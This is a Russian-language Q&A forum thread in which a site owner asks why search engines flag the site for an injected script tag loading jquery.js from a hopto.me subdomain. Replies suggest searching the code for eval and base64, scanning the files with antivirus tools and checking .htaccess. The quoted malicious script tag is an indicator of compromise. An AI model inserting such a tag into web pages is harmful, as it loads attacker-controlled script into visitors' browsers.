Задать вопрос
@udi
вирусы

Вирус на сайте, редирект hopto.me?

Внезапно поисковики Google и Yandex признали мой сайт опасным, обнаружив на нём вредоносный код вида 
<script type="text/javascript" src="//rdomn1384335904.hopto.me/jquery.js?1384336003" />
. При просмотре содержимого страниц разными браузерами, с разных IP, с разными юзерагентами и реферерами подобных записей найдено не было, в т.ч. в отрендеренном DOM (было подозрение на то, что этот код динамически внедряется каким-то javascript).
При этом поисковики при перепроверках исправно находят этот код и отказываются исключать сайт из "черного списка" завирусованных.
Подскажите, может кто сталкивался с таким? Куда копать, что делать?
  • Вопрос задан
  • 3007 просмотров
Комментировать
Подписаться 3 Оценить Комментировать
Решения вопроса 1
dmitriylyalyuev
@dmitriylyalyuev

Для начала код сайта на наличие всяких eval, base64, etc.

Ответ написан
4 комментария
4 комментария
Пригласить эксперта
Ответы на вопрос 2
i_dozi
@i_dozi

Самое быстрое и простое. Мне помогает в 9 из 10 случаях Выкачиваете все файлы сайта к себе на машину, проверяете Avastом и Cureitом. Они покажут какой файл проблемы и что за код.

Еще проверьте .htaccess

Ответ написан
4 комментария
4 комментария
@mdx

Удалось удалить вирус? Если да, подскажи плиз как, у меня яндекс нашел такой же вредосный код

Ответ написан
3 комментария
3 комментария
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
Специалист по управлению уязвимостями (информационная безопасность)
Гринатом Москва
от 100 000 до 120 000 ₽
DevOps specialist 3-й линии поддержки
СберТех Москва
До 230 000 ₽
Администратор PostgreSQL
Гринатом
До 200 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Разработать индикатор для торговой платформы Metatreder5
22 нояб. 2024, в 15:00
2500 руб./в час
Разработка базы данных на SQL
22 нояб. 2024, в 14:51
10000 руб./за проект
Разработка API на Go+ClickHouse
22 нояб. 2024, в 14:51
2000 руб./в час
Ещё заказы